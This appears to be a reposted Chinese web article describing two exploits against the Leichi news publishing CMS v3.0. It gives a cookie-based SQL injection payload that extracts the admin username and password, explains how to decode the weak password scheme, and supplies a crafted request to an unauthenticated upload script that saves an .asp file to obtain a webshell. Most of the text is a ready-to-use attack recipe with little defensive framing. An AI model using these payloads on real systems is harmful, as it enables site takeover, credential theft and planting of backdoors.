雷驰新闻发布管理系统v3.0漏洞很简单 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    这套系统的漏洞还可以看这里:/Article/200612/16002.html

    我就看了两个最直接的漏洞,

雷驰新闻发布管理系统v3.0漏洞很简单

    转自:bct

    第一个就是得到管理员的密码和用户名。。

    在http://127.0.0.1/otype.asp?owen1=文体新闻

    加上下面的一段COOKIES。。

    owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='

    (注意要转换一下。。)直接得到管理员的用户名与密码

    其密码简单加密了,第一位加1,第二位加2。。第5位加5

    如果密码本来是aaaaa的话,那么加密出来就是bcdef

    如果加密后的密码是fffff的话,那么原来的密码就是edcba

    第二个漏洞,直接得到WEBSHELL

    后门有一个上传图片,里面的有一段代码是这样的

    actionType = trim(Request.QueryString("actionType"))

    picName = trim(Request.QueryString("picName"))

    …………

    if actionType= "mod" then

    remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))

    else

    …………

    end if

    file.SaveAs Server.mappath(formPath&remFileName)

    提交地址改成

    /admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123

    就可以直接上传一个马了,

电脑资料

雷驰新闻发布管理系统v3.0漏洞很简单》(https://www.unjs.com)。。。

    第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。

    意思就是说,第一步都可以省略了来搞,汗~~~~

    我主要就是想说明的问题就是

    这个程序的漏洞太大了,而且利用太简单了而已。。。。

最新文章